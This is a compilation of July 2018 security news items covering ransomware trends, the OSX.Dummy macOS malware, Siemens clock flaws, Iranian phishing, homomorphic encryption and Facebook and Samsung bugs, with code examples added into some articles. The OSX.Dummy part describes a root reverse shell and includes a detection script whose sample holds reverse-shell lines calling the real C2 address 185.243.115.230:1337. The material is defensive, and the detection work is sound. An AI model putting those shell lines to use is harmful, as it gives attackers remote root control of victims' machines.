Ransomware and malicious crypto miners in 2016-2018
4.7.2018 Kaspersky
Ransomware
KSN Report: Ransomware and malicious cryptominers 2016-2018

Ransomware is not an unfamiliar threat. For the last few years it has been affecting the world of cybersecurity, infecting and blocking access to various devices or files and requiring users to pay a ransom (usually in Bitcoins or another widely used e-currency), if they want to regain access to their files and devices.

The term ransomware covers two main types of malware: so-called window blockers (which block the OS or browser with a pop-up window) and cryptors (which encrypt the user’s data). The term also encompasses select groups of Trojan-downloaders, namely those that tend to download encryption ransomware once a PC is infected.

Kaspersky Lab has a tradition of reporting on the evolution of ransomware – and you can find previous reports on the threat here and here.

This year, however, we came across a huge obstacle in continuing this tradition. We have found that ransomware is rapidly vanishing, and that cryptocurrency mining is starting to take its place.

The architecture of cryptocurrencies assumes that, in addition to purchasing cryptocurrency, a user can create a new currency unit (or coin) by harnessing the computational power of machines that have specialized ‘mining’ software installed on them.

Cryptocurrency mining is the process of creating these coins – it happens when various cryptocurrency transactions are verified and added to the digital blockchain ledger. The blockchain, in its turn, is a chain of successive blocks holding recorded transactions such as who has transferred bitcoins, how many, and to whom. All participants in the cryptocurrency network store the entire chain of blocks with details of all of the transactions that have ever been made, and participants continuously add new blocks to the end of the chain.

Those who add new blocks are called miners, and in the Bitcoin world, as a reward for each new block, its creator currently receives 12.5 Bitcoins. That’s approximately $30,000 according to the exchange rate on July 1, 2017. You can find out more about the mining process here.

Given the above, this report will examine what is hopefully ransomware’s last breath, in detail, along with the rise of mining. The report covers the period April 2017 to March 2018, and compares it with April 2016 – March 2017.

Main findings
The total number of users who encountered ransomware fell by almost 30%, from 2,581,026 in 2016-2017 to 1,811,937 in 2017-2018;
The proportion of users who encountered ransomware at least once out of the total number of users who encountered malware fell by around 1 percentage point, from 3.88% in 2016-2017 to 2.80% in 2017-2018;
Among those who encountered ransomware, the proportion who encountered cryptors fell by around 3 percentage points, from 44.6% in 2016-2017 to 41.5% in 2017-2018;
The number of users attacked with cryptors almost halved, from 1,152,299 in 2016-2017 to 751,606 in 2017-2018;
The number of users attacked with mobile ransomware fell by 22.5% from 130,232 in 2016-2017 to 100,868 in 2017-2018;
The total number of users who encountered miners rose by almost 44.5% from 1,899,236 in 2016-2017 to 2,735,611 in 2017-2018;
The share of miners detected, from the overall number of threats detected, also grew from almost 3% in 2016-2017 to over 4% in 2017-2018;
The share of miners detected, from overall risk tool detections, is also on the rise – from over 5% in 2016-2017 to almost 8% in 2017-2018;
The total number of users who encountered mobile miners also increased – but at a steadier pace, growing by 9.5% from 4,505 in 2016-2017 to 4,931 in 2017-2018.


Israel Accuses Hamas of Targeting Soldiers With World Cup App
4.7.2018 securityweek BigBrothers

Tel Aviv - Israeli military intelligence on Tuesday accused Hamas hackers of creating a World Cup app and two online dating sites to tempt soldiers into downloading spyware onto their phones.

Briefing journalists at national defence headquarters in Tel Aviv, army intelligence officers said the scam by members of the Palestinian Islamist movement that runs the Gaza Strip failed to damage military security.

"No damage was done, as we stopped it in time," one of the officers said, with the military's response codenamed "Operation Broken Heart".

But he said the attempt showed the Islamist militants had adopted new tactics since a similar attempt was revealed in January 2017.

The emphasis then was solely on the dating game, with the hackers posing online as attractive young women seeking to lure men in uniform into long chats.

This time the traps were aimed at both sexes and there was the additional bait of World Cup action with an app offering "HD live streaming of games, summaries and live updates".

Attackers used stolen identities to create more convincing fake Facebook profiles of young Israelis, written in fluent Hebrew studded with current slang.

"What Hamas is bringing to the table is a very good knowledge of our young people and their state of mind," another officer said. Asked how he could be sure Hamas was behind the online offensive, he declined to say but insisted there was no doubt.

The assailants uploaded their custom-built Golden Cup, Wink Chat and Glance Love applications to the Google Store, to make them seem legitimate, according to the officers.

Using Facebook sharing and WhatsApp messages, they urged young men and women performing Israel's compulsory military service to download the infected apps.

Once on the recipient's phone, officers said, the device could be taken over to covertly take and send photographs, eavesdrop on conversations, copy stored files and pictures and transmit location details.

But in most cases, they said, soldiers did not download the apps and informed their superiors of their suspicions.

Google has since deleted the apps from its store, they added.

They said that awareness of the potential risk had soared since the army publicised the previous attempts.

"Thanks to the soldiers' vigilance, Hamas' intelligence infrastructure was exposed before it caused actual security damage," army briefing notes said. Israel and Palestinian militants in Gaza have fought three wars since 2008.

In March 2016 a Palestinian from Gaza was charged with hacking into Israeli military drones.


New macOS Malware Targets Crypto-Currency Users
4.7.2018 securityweek Apple

A new piece of macOS malware has been observed being distributed via crypto-currency related Slack or Discord chat groups, security researchers warn.

First detailed late last month, the malware is being distributed by malicious actors who impersonate admins or key people. The actors share small snippets of code with the members of said chat groups and try to convince them to run the code in a terminal.

Upon execution of the code, a malicious binary is downloaded and executed on the victim’s machine. Although the social engineering trick isn’t particularly sophisticated, some users apparently fall for it.

The downloaded payload is rather large, at 34MB. As of Friday, the malware wasn’t being detected by any of the 60 anti-virus engines in VirusTotal, Remco Verhoef, ISC Handler and Founder of DutchSec, explains.

The malicious binary is not signed and Gatekeeper would normally flag and block it, but it appears that Apple’s protection measure does not work for files that are executed directly via terminal commands.

The reason the binary is so large is that the author apparently packed libraries such as OpenSSL and V8 into it, Objective-See’s Patrick Wardle, who named the malware OSX.Dummy, points out.

When executed on the target machine, the malware first sets the script to be owned by root. Because the threat runs sudo to change the file’s permissions, the user is prompted to enter their password in the terminal; the malware steals the password and saves it to /tmp/dumpdummy.

Next, OSX.Dummy makes the script executable via chmod +x, moves it to a new directory, dumps a plist file to /tmp/com.startup.plist and then moves it to the LaunchDaemons directory, sets the file’s owner to root, and finally loads the launch daemon defined by that plist, for persistence.

At this point, the malware has ensured that the malicious script is automatically executed by the OS whenever the system is rebooted.

The Python script, the security researchers discovered, attempts to connect to 185.243.115[.]230 on port 1337, then “duplicates stdin, stdout and stderr to the socket, before executing /bin/sh with the -i flag. In other words, it's setting up an interactive reverse shell,” Wardle notes.

Once the connection to the remote command and control (C&C) server is established, the attacker can execute arbitrary commands on the infected machine, as root.

The malware’s capabilities, however, are limited, and every step of the infection process is rather trivial to detect, Wardle says.
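As an added illustration (not code from the article or from Objective-See), here is a defender-side check for the persistence artifacts described above: it parses a LaunchDaemon plist, flags the label, the boot-time Python script and the reverse-shell fragments, and can walk /Library/LaunchDaemons on a live Mac. The indicator values come from the article; the com.startup Label and the sample plist and script contents are assumed/constructed.

```python
"""Added example (not from the article or from Objective-See): a hunt for the
OSX.Dummy persistence artifacts the article describes. Indicator values are
taken from the article; the plist and script samples below are constructed."""
import os
import plistlib
import re

# Indicators quoted in the article.
C2_HOST = "185.243.115.230"
C2_PORT = "1337"
DUMMY_LABEL = "com.startup"          # assumed Label key of /tmp/com.startup.plist
PASSWORD_DUMP = "/tmp/dumpdummy"     # where the stolen sudo password is written
LAUNCH_DAEMON_DIRS = ("/Library/LaunchDaemons",)

# Fragments of the reverse-shell script quoted by Wardle: connect to the C2,
# duplicate the standard streams onto the socket, exec /bin/sh -i.
SCRIPT_PATTERNS = {
    "c2_address": re.compile(re.escape(C2_HOST) + r".{0,40}" + C2_PORT, re.S),
    "fd_duplication": re.compile(r"dup2\s*\("),
    "interactive_shell": re.compile(r"/bin/sh.{0,10}-i"),
}


def assess_launch_daemon(plist_bytes, script_text=None):
    """Return a list of findings for one LaunchDaemon plist (empty if clean).

    script_text is the content of the program the plist runs, or None when
    it could not be read.
    """
    try:
        plist = plistlib.loads(plist_bytes)
    except Exception as exc:  # InvalidFileException / ValueError on garbage input
        return ["unparseable plist: %s" % exc]
    findings = []
    label = str(plist.get("Label", ""))
    args = [str(a) for a in plist.get("ProgramArguments", [])]
    if label.startswith(DUMMY_LABEL):
        findings.append("label matches OSX.Dummy persistence: %s" % label)
    # A system-wide daemon that starts at boot and runs a Python script is
    # exactly the persistence the article describes, and rare on a clean host.
    if plist.get("RunAtLoad") and any("python" in a for a in args):
        findings.append("RunAtLoad daemon runs a Python script: %s" % " ".join(args))
    for name, pattern in SCRIPT_PATTERNS.items():
        if script_text and pattern.search(script_text):
            findings.append("script contains %s indicator" % name)
    return findings


def script_path_from_args(args):
    """Best-effort: the first absolute argument that looks like a Python script."""
    for a in args:
        if a.endswith(".py") and os.path.isabs(a):
            return a
    return None


def scan_host(daemon_dirs=LAUNCH_DAEMON_DIRS):
    """Walk the LaunchDaemons directories on a live host; returns {path: findings}."""
    report = {}
    if os.path.exists(PASSWORD_DUMP):
        report[PASSWORD_DUMP] = ["password dump file present"]
    for d in daemon_dirs:
        if not os.path.isdir(d):
            continue
        for name in os.listdir(d):
            path = os.path.join(d, name)
            with open(path, "rb") as fh:
                data = fh.read()
            script_text = None
            try:
                args = [str(a) for a in plistlib.loads(data).get("ProgramArguments", [])]
                sp = script_path_from_args(args)
                if sp and os.path.isfile(sp):
                    with open(sp, errors="replace") as fh:
                        script_text = fh.read()
            except Exception:
                pass  # unreadable plist or script: assess_launch_daemon reports it
            findings = assess_launch_daemon(data, script_text)
            if findings:
                report[path] = findings
    return report


# Constructed samples for offline use: one mimicking the article's daemon, one clean.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.startup</string>
  <key>ProgramArguments</key>
  <array><string>/usr/bin/python</string><string>/Users/Shared/script.py</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""
SAMPLE_SCRIPT = (  # non-functional fragments of the behaviour the article describes
    's.connect(("185.243.115.230", 1337))\n'
    "os.dup2(s.fileno(), 0)\n"
    'subprocess.call(["/bin/sh", "-i"])\n'
)
CLEAN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.backup</string>
  <key>ProgramArguments</key><array><string>/usr/local/bin/backup</string></array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    print("sample:", assess_launch_daemon(SAMPLE_PLIST, SAMPLE_SCRIPT))
    print("clean: ", assess_launch_daemon(CLEAN_PLIST))
    print("host:  ", scan_host())
```

Run it as root on a Mac to include daemons whose scripts are not world-readable; on other systems scan_host simply returns an empty report.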


Flaws Expose Siemens Central Plant Clocks to Attacks
4.7.2018 securityweek
Vulnerability

Siemens informed customers on Tuesday that some of its SICLOCK central plant clocks are affected by several vulnerabilities, including ones that have been rated “critical.”

Siemens SICLOCK devices are used to synchronize time in industrial plants. The central plant clock ensures stability in case of a failure or loss of reception at the primary time source.

According to the German industrial giant, SICLOCK systems are affected by a total of six vulnerabilities. The security holes have been assigned the CVE identifiers CVE-2018-4851 through CVE-2018-4856.

Siemens SICLOCK vulnerabilities

Three of the flaws have been classified as critical. One of them allows an attacker with access to the network to cause the targeted device to enter a denial-of-service (DoS) condition – and possibly reboot – by sending it specially crafted packets.

“The core functionality of the device could be impacted. The time serving functionality recovers when time synchronization with GPS devices or other NTP servers are completed,” Siemens wrote in its advisory. “The vulnerability could impact the availability of the device, and could impact the integrity of the time service functionality of the device.”

Another critical vulnerability can be exploited by an attacker with access to UDP port 69 to modify the firmware on a targeted SICLOCK device. Access to the same port is also required for the exploitation of a different critical flaw that allows an attacker to modify the administrative client stored on the device and execute arbitrary code.

A high severity flaw disclosed by Siemens can allow a network attacker to bypass authentication, but exploitation requires the hacker to obtain specific information about the targeted device.

Siemens SICLOCK vulnerabilities

The remaining security holes are a medium severity issue that allows a man-in-the-middle (MitM) attacker to intercept unencrypted passwords stored in client configuration files, and a low severity bug that can be exploited by an attacker with admin access to the management interface to lock out legitimate users.

Four of the six vulnerabilities can be exploited without any user interaction. Siemens says it’s not aware of any instances where these flaws have been exploited for malicious purposes.

The impacted products are SICLOCK TC100, which is designed for smaller plants, and SICLOCK TC400. Since both products are in the process of being phased out, Siemens has not released any firmware updates, and instead advised customers to apply a series of workarounds and mitigations that should reduce the risk of attacks.

Mitigations include the installation of redundant time sources and implementation of plausibility checks for critical controllers in the plant, and protecting network access to impacted devices.


Iranian Hackers Impersonate Israeli Security Firm
4.7.2018 securityweek BigBrothers

A group of Iranian hackers focused on cyber-espionage recently built up a website to impersonate ClearSky Cyber Security, the Israeli firm that exposed their activities not long ago.

The hackers, tracked as APT35 and also known as NewsBeef, Newscaster, and Charming Kitten, have been active since at least 2011, with their activities detailed for the first time several years ago.

In December 2017, ClearSky Cyber Security published a report detailing the group’s activities during the 2016-2017 timeframe. The security firm not only described the actor’s infrastructure, but also provided information on DownPaper, a new piece of malware the hackers had been using.

The security firm exposed the link between the group and Behzad Mesri, also known as Skote Vahshat, who was charged in November 2017 with the hacking of HBO. Furthermore, the researchers also managed to establish the identity of two other alleged members of the group.

Roughly half a year after the report was published, the security firm announced on its Twitter account that the hackers built their own site impersonating ClearSky.

“#CharmingKitten built a phishing website impersonating our company. The fake website is clearskysecurity\.net (the real website is http://clearskysec.com),” the security firm announced.

The advanced persistent threat (APT) apparently copied entire pages from the legitimate website, but also changed one of them to include a sign in option with multiple services. Anyone entering credentials there would have had them sent to the actor instead.

“These sign in options are all phishing pages that would send the victim's credentials to the attackers. Our legitimate website does not have any sign in option. It seems that the impersonating website is still being built because some of the pages have error messages in them,” the security firm announced.

One of the pages on the fake website, the security researchers discovered, featured content related to a Charming Kitten campaign that ClearSky exposed only several weeks ago. That page, however, wasn’t customized to look like the security firm’s website.

The fake website started being flagged as deceptive soon after ClearSky discovered it. The security firm says that its employees, services, and customers were not affected.

Over the past years, security researchers managed to link various hacking groups to Iran, including APT33, Rocket Kitten, Magic Hound, and CopyKittens, and even revealed that they tend to share infrastructure and malware code.


Data Security Startup Enveil Unveils Homomorphic Encryption Platform
4.7.2018 securityweek Crypto

Enveil's New "ZeroReveal" Platform Enables Homomorphic Encryption to Secure Data in Use

Sensitive data exposure is classified by OWASP as the third most critical web application vulnerability. Encryption is the primary solution. But encryption is only generally available for data at rest and data in transit -- leaving the third state of data (data in use) potentially exposed. Bank card details, for example, can be stored encrypted and can be transmitted encrypted -- but they currently must be decrypted and exposed at the point of processing.

Finding some way for data to remain encrypted and secure even during processing is considered the holy grail of encryption. One method, homomorphic encryption, was first mooted in 1978; but initially without any clear proof that it was possible. Today, start-up firm Enveil has launched the first practical and scalable commercial homomorphic encryption platform, ZeroReveal.

The core technology originates from within the NSA. Enveil's CEO and founder, mathematician Ellison Anne Williams, worked on the project within the NSA as a senior researcher for 12 years. When she left in 2015 she took the technology with her, exclusively, and founded Enveil in 2016. Since then, Enveil has expanded and matured the core technology to the point of launching a commercial product.

"Continued reports of chip flaws [eg, Spectre and Meltdown] and data breaches in recent months make it clear that encrypting data at rest and in transit isn't good enough in today's volatile security environment. Organizations must eliminate the data in use security gap and do so in a way that won't negate investments in existing systems and protocols," explains Williams. "We allow you to securely use data where it is and as it is today, delivering nation-state level security -- no system overhaul required."

When people use data, it is typically undertaken by running a search or analytic over the data. Enveil concentrates on the security posture of that search or analytic as it is being performed.

"We have two-party form factor," Williams told SecurityWeek. "From a technology standpoint, it means that we can take a search or analytic that folks will want to perform over data, and we can encrypt that, and then we can run that encrypted search over massive amounts of data anywhere, without ever decrypting anything. We never decrypt the search itself, and if the underlying data also happens to be encrypted, we don't have to decrypt that either. We accomplish this through the ZeroReveal Compute Fabric where we can encrypt the search, send that out to the data location, and that can be processed there without ever being decrypted."

This is made possible by the magic math known as homomorphic encryption. "It's been around for a while," continued Williams, "and a lot of work has gone into it. It allows you to perform operations on encrypted data as if it were unencrypted data. This is powered by the mathematical nature of homomorphic encryption. Until now it has remained computationally intensive and not practical. Our major breakthrough has been moving this holy grail from the realm of the theoretical to the realm of the practical."

ZeroReveal solves very specific use cases. "How do I go and encrypt my most sensitive data and put it securely in the cloud," said Williams, "but yet still be able to process it in its encrypted state in the cloud platform? It has become practical because of advances in the way that we use the homomorphic encryption rather than simply massive increases in compute power."

One of ZeroReveal's great strengths is that it works on existing encrypted data -- the secret resides in the homomorphically encrypted search or analytic. "We sit above the storage technology," she said. "People don't have to change the mechanism of storage or how they currently encrypt their data. This is what is new. In traditional homomorphic systems, you must have the data itself encrypted homomorphically to operate on it. We don't do that at all. It's because we're looking for bit matches rather than character matches in the underlying data. It allows us to search across any data store, encrypted or unencrypted, and encrypted with any crypto and even graphics -- it's all represented by the bit values that we search on."
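To make the "encrypt the search, run it over the data, never decrypt it" idea concrete, here is an added example that is not Enveil's code and does not reproduce its proprietary method: it uses the textbook Paillier cryptosystem, whose additive homomorphism lets a client encrypt a one-hot selector, have a server combine it with plaintext records, and decrypt the single record it asked for, while the server never learns which record was selected. The primes and the record values are constructed demo values, far too small for real use.

```python
"""Added example: private record lookup with the textbook Paillier cryptosystem.

This is not Enveil's ZeroReveal and does not reproduce its technique; it only
shows the homomorphic property the article describes. The client encrypts a
one-hot selector ("the search"); the server, holding plaintext records, folds
the ciphertexts together and returns one ciphertext it cannot read.
"""
from math import gcd
import secrets

# Constructed demo primes (far too small for real use).
P, Q = 10007, 10009


def lcm(a, b):
    return a * b // gcd(a, b)


def keygen(p=P, q=Q):
    """Paillier keys with g = n + 1. Public: (n, n^2). Private: (lam, mu)."""
    n = p * q
    lam = lcm(p - 1, q - 1)
    mu = pow(lam, -1, n)   # inverse of L(g^lam mod n^2), which equals lam when g = n+1
    return (n, n * n), (lam, mu)


def encrypt(pub, m):
    """E(m) = (1+n)^m * r^n mod n^2 with fresh random r, so E(0) != E(0)."""
    n, n2 = pub
    if not 0 <= m < n:
        raise ValueError("plaintext out of range")
    while True:
        r = secrets.randbelow(n - 1) + 1       # r in [1, n-1]
        if gcd(r, n) == 1:
            break
    return ((1 + m * n) % n2) * pow(r, n, n2) % n2   # (1+n)^m == 1 + m*n (mod n^2)


def decrypt(pub, priv, c):
    n, n2 = pub
    lam, mu = priv
    x = pow(c, lam, n2)              # = 1 + m*lam*n (mod n^2)
    return ((x - 1) // n) * mu % n   # L(x) * mu = m*lam*lam^-1 = m


def add(pub, c1, c2):
    """E(a) * E(b) = E(a + b): addition on ciphertexts."""
    return c1 * c2 % pub[1]


def scale(pub, c, k):
    """E(a)^k = E(k * a): a plaintext scalar applied to a ciphertext."""
    return pow(c, k, pub[1])


def client_encrypt_query(pub, index, n_records):
    """The 'encrypted search': a one-hot selector with every entry encrypted.
    Because encryption is randomised, the server cannot tell E(1) from E(0)."""
    return [encrypt(pub, 1 if i == index else 0) for i in range(n_records)]


def server_apply_query(pub, enc_query, records):
    """Runs the encrypted query over plaintext records without decrypting anything:
    computes E(sum_i sel_i * rec_i), which is E(rec_index)."""
    if len(enc_query) != len(records):
        raise ValueError("query length must match the record set")
    acc = encrypt(pub, 0)
    for sel, rec in zip(enc_query, records):
        acc = add(pub, acc, scale(pub, sel, rec))
    return acc


def private_lookup(index, records):
    """End-to-end: client keygen + query, server evaluation, client decryption."""
    pub, priv = keygen()
    query = client_encrypt_query(pub, index, len(records))
    return decrypt(pub, priv, server_apply_query(pub, query, records))


if __name__ == "__main__":
    balances = [1200, 340, 9981, 77]   # constructed plaintext records on the server
    print("record 2 retrieved privately:", private_lookup(2, balances))
```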

The use cases are already extensive, and will only grow with the increase of big data aggregators. Consider, for example, a third-party aggregation of financial data. The very act of searching that data for specific information can highlight confidential considerations of potential M&A activity. But with the search encrypted (irrespective of whether or how the big data itself is encrypted), no outside party will know what the query was.

It would allow health organizations to anonymize and encrypt personal health data, and allow researchers to analyze the data without it ever having to be decrypted. It would allow staff to work on sensitive data from home -- or anywhere -- over the weekend without having to decrypt and copy the data to a laptop. And it clearly has huge potential to protect both data owners and data processors concerned about GDPR.

"The range of potential use cases for homomorphic encryption is vast," says Garrett Bekker, principal analyst, Information Security at 451 Research. "By focusing on the encryption-in-use space, Enveil complements data-at-rest and data-in-motion encryption to fill a gap in the overall data security landscape."

Fulton, Maryland-based Enveil was founded in 2016 by Ellison Anne Williams. It raised $4 million from investors including Bloomberg, Thomson Reuters, USAA, In-Q-Tel and DataTribe. The firm focuses solely on securing data in use, and works seamlessly with existing investments in securing data at rest and data in transit.


Iranian Charming Kitten APT group poses as Israeli cybersecurity firm in phishing campaign
3.7.2018 securityaffairs APT

Iranian APT groups continue to be very active; recently, Charming Kitten cyber spies attempted to pose as the Israeli cyber-security firm that uncovered their previous hacking campaigns.
The Iranian Charming Kitten APT group, aka Newscaster or Newsbeef, launched spear-phishing attacks against people interested in reading reports about it.

The Newscaster group made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.

Iranian hackers used a network of fake accounts (the NEWSCASTER network) on the major social media platforms to spy on US officials and political staff worldwide, as reported in an analysis by iSIGHT Partners. The Charming Kitten group is also known for the abuse of open source security tools, including BeEF.

The threat actor targeted numerous entities in Iran, the U.S., Israel, the U.K. and other countries. The hackers also hit individuals involved in academic research, human rights, and the media.

ClearSky detailed the group’s activities during 2016-2017, the report includes information related to the infrastructure used by the APT and to a new strain of malware dubbed DownPaper.

The report also linked the hacker behind the HBO security breach to the Charming Kitten, and reveals the identities of two other alleged members of the group.

Recently, experts from the Israeli cyber-security firm ClearSky Security discovered that the Charming Kitten APT had created a rogue copy (clearskysecurity.net) of the company’s official website (clearskysec.com).

Charming Kitten

“Charming Kitten built a phishing website impersonating our company,” states ClearSky. “They copied pages from our public website and changed one of them to include a ‘sign in’ option with multiple services.”

“These sign-in options are all phishing pages that would send the victim’s credentials to the attackers,” ClearSky said. “Our legitimate website does not have any sign in option.”

ClearSky Cyber Security
@ClearskySec
#CharmingKitten built a phishing website impersonating our company. The fake website is clearskysecurity\.net (the real website is http://clearskysec.com ). They copied pages from our public website and changed one of them to include a "sign in" option with multiple services.

4:15 PM - Jul 1, 2018
The experts believe they discovered the rogue website while the Iranian APT was still working on it.

“It seems that the impersonating website is still being built because some of the pages have error messages in them,” ClearSky added.

The experts discovered that the fake clearskysecurity.net domain was hosted on a server that was associated with the Charming Kitten APT by ClearSky last month.


ClearSky Cyber Security
@ClearskySec
Potentially #CharmingKitten put BeEF in The Jewish Journal, and set up fake domains of Deutsche Welle (Germany's public international broadcaster) and Frost&Sullivan:

jewishjournal\.us
deutcshewelle\.org
deutcshewelle\.com
frostsullivan\.org

More:https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.q59o3v69qjhh …

9:57 AM - Jun 12, 2018
The server was still hosting content from previous campaigns, a further clue linking it to the Iranian hacker group.

The website appears to still be under development, so it was likely not yet involved in any hacking campaign.

As the website was not finished, ClearSky doesn’t believe the Iranian hackers managed to phish anyone yet. The website was taken down within a few hours of its discovery.

Iranian hackers are becoming even more aggressive even if experts believe that they are not particularly sophisticated.

Recently we discussed how the OilRig gang has been using a new Trojan in attacks aimed at targets in the Middle East.

OilRig is just one of the Iran-linked hacker crews, other groups tracked by security experts are APT33, Rocket Kitten, Cobalt Gypsy (Magic Hound), Charming Kitten (aka Newscaster and NewsBeef) and CopyKittens.


The Social network giant Facebook confirms it shared data with 61 tech firms after 2015
3.7.2018 securityaffairs
Social

On Friday, Facebook provided a 748-page long report to Congress that confirms the social network shared data with at least 61 tech firms after 2015.
This is the worst period in the social network’s history: Facebook has now admitted to having shared users’ data with 61 tech firms.

The problem is that Facebook allowed tech companies and app developers to access its users’ data after announcing in 2015 that it had restricted third-party access to that data.

Immediately after the Cambridge Analytica privacy scandal that affected 87 million users, Facebook attempted to ease media pressure by confirming that it had restricted third-party access to its users’ data since May 2015.

On Friday, Facebook provided a 748-page long report to Congress that confirms the practice of sharing data with 61 tech firms after 2015.

The company also granted a “one-time” six-month extension to the companies to come into compliance with Facebook’s new privacy policy.

“In April 2014, we announced that we would more tightly restrict our platform APIs to prevent abuse. At that time, we made clear that existing apps would have a year to transition—at which point they would be forced (1) to migrate to the more restricted API and (2) be subject to Facebook’s new review and approval protocols.” reads the report.

“The vast majority of companies were required to make the changes by May 2015; a small number of companies (fewer than 100) were given a one-time extension of less than six months beyond May 2015 to come into compliance.”

In addition, the company admitted that a very small number of companies (fewer than 10) have had access to limited friends’ data as a result of API access that they received in the context of a beta test.

The social media firm also shared a list containing 52 companies that it has authorized to build versions of Facebook or Facebook features for their devices and products.

The list includes Acer, Amazon, Apple, Blackberry, Microsoft, Motorola/Lenovo, Samsung, Sony, Spotify, and the Chinese companies Huawei and Alibaba.

“The partnerships—which we call “integration partnerships”—began before iOS and Android had become the predominant ways people around the world accessed the internet on their mobile phones.” explained Facebook.

“We engaged companies to build integrations for a variety of devices, operating systems, and other products where we and our partners wanted to offer people a way to receive Facebook or Facebook experiences,” the document reads. “These integrations were built by our partners, for our users, but approved by Facebook.”

The social network confirmed it has already ended 38 of these 52 partnerships; an additional seven will be discontinued by the end of July, and another one by the end of this October. The company will continue its partnerships with Tobii (an accessibility app that enables people with ALS to access Facebook), Amazon, Apple, Mozilla, Alibaba and Opera.

“Three partnerships will continue: (1) Tobii, an accessibility app that enables people with ALS to access Facebook; (2) Amazon; and (3) Apple, with whom we have agreements that extend beyond October 2018. We also will continue partnerships with Mozilla, Alibaba and Opera— which enable people to receive notifications about Facebook in their web browsers—but their integrations will not have access to friends’ data.” added the company.

Privacy advocates and security experts have called the way the social network managed users’ data questionable, especially after 2015.

Just a few days ago, I reported the news that a popular third-party quiz app named NameTests was found exposing data of up to 120 million Facebook users.


Facebook is notifying 800,000 users affected by a blocking bug
3.7.2018 securityaffairs
Social

Yesterday the social network giant Facebook started notifying 800,000 users affected by a blocking bug. The company has already fixed it.
When a Facebook user blocks someone, the blocked user is no longer able to interact with them: they cannot see the blocker’s posts, start conversations with them on Messenger or add them as a friend. Because of the bug, a blocked user may also have been able to contact the blocker via Messenger.

Facebook discovered a bug affecting its platform that allowed blocked users to interact with the accounts that had blocked them. As a result, blocked users were able to see some of the content posted by the individuals who had blocked them.

The issue was introduced on May 29, and the social network giant addressed it on June 5.

“Starting today we are notifying over 800,000 users about a bug in Facebook and Messenger that unblocked some people they had blocked. The bug was active between May 29 and June 5 — and while someone who was unblocked could not see content shared with friends, they could have seen things posted to a wider audience. For example pictures shared with friends of friends.” wrote Facebook Chief Privacy Officer Erin Egan.

According to Egan, a blocked user who was temporarily unblocked by the bug could not see content shared only with friends, but may have been shown content shared with “friends of friends.”

Egan clarified that blocking also automatically unfriends users if they were previously friends.

Below are the details shared by Egan on this specific bug.

It did not reinstate any friend connections that had been severed;
83% of people affected by the bug had only one person they had blocked temporarily unblocked; and
Someone who was unblocked might have been able to contact people on Messenger who had blocked them.
Facebook has fixed the bug and everyone has been blocked again; the company is sending a notification to the affected accounts encouraging them to check their blocked list.

Facebook bug


A Samsung Texting App bug is sending random photos to contacts
3.7.2018 securityaffairs Mobile

Some Samsung devices are randomly sending photos taken with the camera to contacts in the address book without permission.
Do you have a Samsung smartphone? There is something you need to know.

Some devices are randomly sending photos taken with the camera to contacts in the address book without permission.

The problem affected Galaxy S9 and S9+ devices, but we cannot exclude that other devices may have been affected.

The news was first reported by Gizmodo; several users had reported the anomalous behavior on Reddit and on the company’s official forums.

“Sending pictures to others is one of the most basic functions of a smartphone, but when your phone’s texting app starts randomly pushing out photos without your knowledge, you got a problem.” reported Gizmodo.

“And unfortunately, according to a smattering of complaints on Reddit and the official Samsung forums, it seems that’s exactly what happened to a handful of Samsung phone users, including owners of late model devices such as the Galaxy Note 8 and Galaxy S9.”

One user explained that his phone sent all his photos to his girlfriend overnight, but there was no record of it in his messages app. He discovered that there was a record of the activity in his carrier’s logs.

“Last night around 2:30 am, my phone sent her my entire photo gallery over text but there was no record of it on my messages app. However, there was record of it on tmobile logs. Why would this happen?” wrote the user on Reddit.

The unwanted messages were sent out via the Samsung Messages app; some users only discovered the issue when the recipients of the photos replied to them.

Samsung confirmed it is “aware of the reports” and that its technical staff is investigating the problem.


Below is the list of problems users have observed since RCS Messaging was enabled; they occur with the Scheduled Text feature.

Scheduled Messages are sent prematurely
Scheduled text Messages end up in WRONG threads
Messaging incorrectly displays scheduled messages as “sent” when, in fact, the other party has not received them.
Many users speculate that the glitch was introduced by the RCS messaging updates pushed by telco carriers.

As a temporary measure, Samsung owners can revoke Samsung Message’s permissions to access storage (Settings -> Apps -> Samsung Messages -> Permissions -> Storage).

“Concerned customers are encouraged to contact us directly at 1-800-SAMSUNG,” Samsung added.


Mozilla Announces Root Store Policy Update
3.7.2018 securityweek  Security

Mozilla announced on Monday that its Root Store Policy for Certificate Authorities (CAs) has been updated to version 2.6.

The Root Store Policy governs CAs trusted by Firefox, Thunderbird and other Mozilla-related software. The latest version of the policy, discussed by the Mozilla community over a period of several months, went into effect on July 1.

The new Root Store Policy includes nearly two dozen changes and some of the more important ones have been summarized in a blog post by Wayne Thayer, CA Program Manager at Mozilla.

Version 2.6 of the Root Store Policy requires CAs to clearly disclose email address validation methods in their certificate policy (CP) and certification practice statement (CPS). The CP/CPS must also clearly specify IP address validation methods, which have now been banned in specific circumstances.

CAs need to periodically obtain certain audits for their root and intermediate certificates in order to remain in the root store. Mozilla now requires auditors to provide reports written in English.

The new policy also states that starting January 1, 2019, CAs will be required to create separate intermediate certificates for S/MIME and SSL certificates.

“Newly issued Intermediate certificates will need to be restricted with an EKU extension that doesn’t contain anyPolicy, or both serverAuth and emailProtection. Intermediate certificates issued prior to 2019 that do not comply with this requirement may continue to be used to issue new end-entity certificates,” Thayer explained.
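As an added example (not Mozilla’s code or policy text), the following checks a DER-encoded Extended Key Usage extension value against the intermediate-certificate rule described above. The “any” value in an EKU extension is anyExtendedKeyUsage (OID 2.5.29.37.0); the serverAuth and emailProtection OIDs are the standard RFC 5280 ones, and the helper names are assumptions.

```python
# Added example, not Mozilla's code: does an intermediate CA's EKU extension
# satisfy the separation rule (present, no anyExtendedKeyUsage, and not both
# serverAuth and emailProtection)? Includes a minimal DER encoder/decoder for
# ExtKeyUsageSyntax ::= SEQUENCE OF KeyPurposeId so it runs without a
# certificate library.
ANY_EKU = "2.5.29.37.0"            # anyExtendedKeyUsage
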